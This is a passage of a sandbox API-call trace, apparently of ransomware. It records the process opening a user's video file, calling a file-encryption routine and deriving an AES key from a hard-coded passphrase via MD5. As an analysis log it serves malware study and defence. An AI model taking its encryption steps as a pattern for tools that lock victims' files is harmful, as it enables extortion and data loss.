Size=0x10) returned 0x43ca0a0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.371] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0096.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0096.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0096.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf" (normalized: "c:\\users\\fd1hvy\\videos\\-frmf8je.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0096.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0096.374] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e48 [0096.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0096.375] CloseHandle (hObject=0x298) returned 1 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.375] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.375] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0096.375] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca44c10, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0x42d38240, ftLastAccessTime.dwHighDateTime=0x1d5e55b, ftLastWriteTime.dwLowDateTime=0x42d38240, ftLastWriteTime.dwHighDateTime=0x1d5e55b, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="-frmf8je.swf", cAlternateFileName="")) returned 0x41ac780 [0096.375] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0096.375] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0096.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0096.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0096.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796fc8 [0096.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0096.376] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0096.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0096.377] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0096.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.377] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0096.378] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.378] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.378] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.378] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0096.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca310, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0096.378] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0096.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0096.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.379] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0096.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2668 [0096.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca268, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0096.380] CryptHashData (hHash=0x41ac540, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0096.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca1d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0096.380] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.382] HeapFree (in: 